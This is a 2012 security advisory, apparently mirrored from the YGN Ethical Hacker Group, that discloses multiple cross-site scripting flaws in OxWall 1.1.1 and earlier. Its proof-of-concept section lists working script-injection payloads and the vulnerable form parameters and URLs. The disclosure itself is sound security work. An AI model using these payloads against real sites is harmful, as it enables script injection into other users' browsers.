Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:27695
HistoryFeb 22, 2012 - 12:00 a.m.

OxWall 1.1.1 <= Multiple Cross Site Scripting Vulnerabilities

2012-02-2200:00:00
vulners.com
155
  1. OVERVIEW

OxWall 1.1.1 and lower versions are vulnerable to Cross Site Scripting.

  1. BACKGROUND

Oxwall is a free open source software package for building social
networks, family sites and collaboration systems. It is a flexible
community website engine developed with the aim to provide people with
a well-coded, user-friendly software platform for social needs. It is
easy to set up, configure and manage Oxwall while you focus on your
site idea. We are testing the concept of free open source community
software for complete (site,sub-site setups) and partial
(widgets,features) community and collaboration solutions for companies
and individuals.

  1. VULNERABILITY DESCRIPTION

Multiple parameters were not properly sanitized, which allows attacker
to conduct Cross Site Scripting attack. This may allow an attacker to
create a specially crafted URL that would execute arbitrary script
code in a victim's browser.

  1. VERSIONS AFFECTED

1.1.1 and lower

  1. PROOF-OF-CONCEPT/EXPLOIT

URL: http://localhost/Oxwall/join

Injected Attack String: '"><script>alert(/XSS/)</script>
Method: HTTP POST
Vulnerable Parameters: captchaField, email, form_name ,password
,realname ,repeatPassword ,username


URL: http://localhost/Oxwall/contact

Injected Attack String: '"><script>alert(/XSS/)</script>
Method: HTTP POST
Vulnerable Parameters: captcha, email, form_name ,from , subject

URL: http://localhost/Oxwall/blogs/browse-by-tag?tag=&#37;27&#37;22&#37;3E&#37;3Cscript&#37;3Ealert&#37;28/XSS/&#37;29&#37;3C/script&#37;3E
Vulnerable Parameter: tag


Vulnerable Parameter: RAW-URI

http://localhost/Oxwall/photo/viewlist/tagged/&gt;&lt;img src=xs onerror=alert('XSS')>

http://localhost/Oxwall/photo/viewlist/&#37;22style&#37;3d&#37;22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0&#37;22onmouseover=alert&#37;28&#37;27XSS&#37;27&#37;29;&#37;22x=

http://localhost/Oxwall/video/viewlist/&#37;22style&#37;3d&#37;22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0&#37;22onmouseover=alert&#37;28&#37;27XSS&#37;27&#37;29;&#37;22x=

  1. SOLUTION

Upgade to the latest version of Oxwall.

  1. VENDOR

Oxwall Foundation
http://www.oxwall.org/

  1. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.

  1. DISCLOSURE TIME-LINE

2011-06-09: notified vendor
2012-02-20: vulnerability disclosed

  1. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/&#37;5BOxWall_1.1.1&#37;5D_xss
Oxwall Home Page: http://www.oxwall.org/

#yehg [2012-02-20]